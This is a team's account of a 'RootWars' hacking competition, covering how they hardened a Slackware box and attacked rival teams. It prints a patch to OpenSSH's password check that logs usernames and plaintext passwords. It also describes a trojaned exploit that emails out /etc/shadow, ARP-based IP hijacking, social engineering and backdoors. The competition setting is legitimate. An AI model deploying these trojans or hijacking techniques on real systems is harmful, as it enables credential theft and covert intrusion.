Team Zion's Whitepaper

roothack.org

by Team Zion

Team Zion's Whitepaper - Phased, redby, deltrex, d0tslash, trinix, and core


I did not have a chance to get involved until after the Grace Period had ended so this is redby's account of the initial configuration and setup. Our machine, Hades, was running Slackware Linux 7.0.0 with the 2.2.13 Linux Kernel. We removed the set[ug]id bits on all the binaries except su which we moved to /usr/bin/traceroute. A kernel module which removed ptrace capabilities was compiled and insmod'd to keep us from getting rooted through a kernel hole. Originally our machine was running the Washington University FTP daemon version 2.6.0 which is full of holes; this was replaced with the latest proftpd. I later swapped out proftpd for vsftpd and allowed full anonymous access. Apache was replaced with thttpd until I finished writing a simple hard coded web server which does not accept any user input. It simply waits for a connection, sleeps for a second, and spits out a web page. Sendmail was replaced with postfix. We compiled and installed sniffit, secure sniffer, pcap, nmap, ncurses, ippl, openssl, openssh, arpoison, netcat, libnet, etc.. I installed a fake pop3 daemon and started up various internal services of the Internet Super Server such as echo. Finally we compiled a secure shell daemon with a magic password to allow us to regain access in a pinch. Once we had our system configured we fixed the initialization scripts so that our configuration would remain intact after a reboot. To break most exploits and retard a takeover we used chattr to make just about all of the file system immutable.


Once Open Season had commenced a few of our team members noticed their accounts had been compromised on the gateway (Acheron).It was determined that two of the teams had violated the Grace Period rules and were promptly disqualified. c0n took over Erebus, a Caldera OpenLinux 3.1 machine which had previously been assigned to one of the disqualified teams. In his haste to configure Erebus during Open Season he moved /bin/sh out of the way and later rebooted without remembering to move it back. Due to the fact that epic was participating in the games any machine fixes required a considerable amount of time. I thought I might take advantage of Erebus being down to steal c0n's password by hijacking his IP address and setting up a hacked sshd to log usernames and passwords on the port from which his sshd had been running. I had to rebuild our kernel with IP aliasing support, additionally I compiled and installed the latest openssl. The next step was to modify "auth-passwd.c" and recompile openssh. Here's the hack I made (int fd at the top of the function of course ;):


/* Authentication is accepted if the encrypted passwords are identical. */

/* core */

fd = open("/home/core/sshd_log",O_CREAT|O_APPEND|O_WRONLY,S_IRUSR|S_IWUSR|S_IRGRP|S_IROTH);

write(fd,(void *)pw->pw_name,strlen(pw->pw_name));

write(fd,(void *)":",1);

write(fd,(void *)password,strlen(password));

write(fd,(void *)"\n",1);

close(fd);

/* core */


return (strcmp(encrypted_password, pw_password) == 0);

}

#endif /* !USE_PAM && !HAVE_OSF_SIA */

I tried to social engineer c0n into believing epic had fixed his machine so that he would connect. c0n's paranoia saved him and I later found out that he had done an `arp -na' before attempting to connect to his machine which revealed that Erebus and Hades had the same MAC address. While I was waiting for c0n to login I thought I might as well upgrade our kernel to 2.2.20 which resulted in disaster when it didn't bring up the ethernet interface. Epic rebooted the machine and selected our old kernel in LILO which put us back in the game. At some point pir8 required us to run rpc.portmap which we setup and closely monitored. I found a fake portmap exploit on packetstorm and modified it to setup an inetd backdoor and e-mail me the userid, `uname -a', `ifconfig -a' and the contents of /etc/passwd and /etc/shadow. I then placed the source code and a binary in /var/tmp on Acheron in the hopes that another team could be so foolish to run it as root.

After the failure to get c0n's password I decided to see if I could steal all the teams IP addresses. With the help of arpoison we were able to hijack all the teams IPs by creating IP aliases with ifconfig. I had gone to sleep but luckily deltrex came on during this time. He found epic and bl00k's passwords in my sshd log file and shutdown our interface to Orion's IP address, logged in and changed their passwords. His shell timed out or was killed from the gateway and when he got back online epic had regained access to his machine and fixed the passwords. Later on the teams were required to add a guest account. I changed the permissions on `traceroute' (our su) to 4710 and changed the group to "users" so that guest did not have any suids to work with. I remounted /home "nosuid,nodev" and made both /tmp and /var/tmp immutable so that there was no means to exploit the system locally since setuid would not be honored and home was the only place the guest account could create a file. Kremit came online and asked how we had hacked him. I checked the sshd logs and sure enough he and toymachine had tried to login to Erinys, at this point we were still holding the IP. I convinced him that he had been "owned" and that he could read about how in the whitepaper (Hi Kremit ;). Once he logged off I removed the interface to his IP address and logged in as his user. His team had not secured Erinys locally and seeing as it was running Red Hat 6.1 it was a matter of seconds before root was compromised with an su exploit. I set about securing Erinys. Flashback--before rooting Erinys I logged into Orion as guest. Epic had trojaned half the system and this was his demise. The first thing I did was `find / -type f -perm -4000 -ls 2>/dev/null' which revealed that /bin/false and /sbin/shutdown at least were both setuid root. This seemed to me like an obvious backdoor. I ran /bin/false which prompted me for a password. I took a guess and it proceeded to pipe /dev/urandom to my terminal. No fun for a modem user! So I had a look at /sbin/shutdown. Being the devious person I am, and assuming this might just be a Red Hat configuration problem I ran `/sbin/shutdown -h now' and to my bewilderment I was staring at "bash#"! In a state of serendipity I hurriedly started killing processes. I meant to kill the sshd daemon but not the child processes and without thinking made the mistake of using killall instead of kill. Argh! But, epic rebooted the system and within a matter of minutes I was able to turn back time and do it right. Because Orion was so heavily trojaned I spent several hours trying to remove any methods epic could use to regain access. In the end I setup a tcp backdoor and my web server.


Conclusions, aside from killing my teams box twice we had a good outcome! I learned a lot about what to do and what not to do in RootWars. I think as far as a team I could not have asked for a better one. There was very little fighting about what should be done and everyone seemed to have a clear focus on the task at hand at all times. We were fortunate enough to have members spanning all time zones which afforded us the opportunity to strike when other teams were idle.

Good game!

core - Team Zion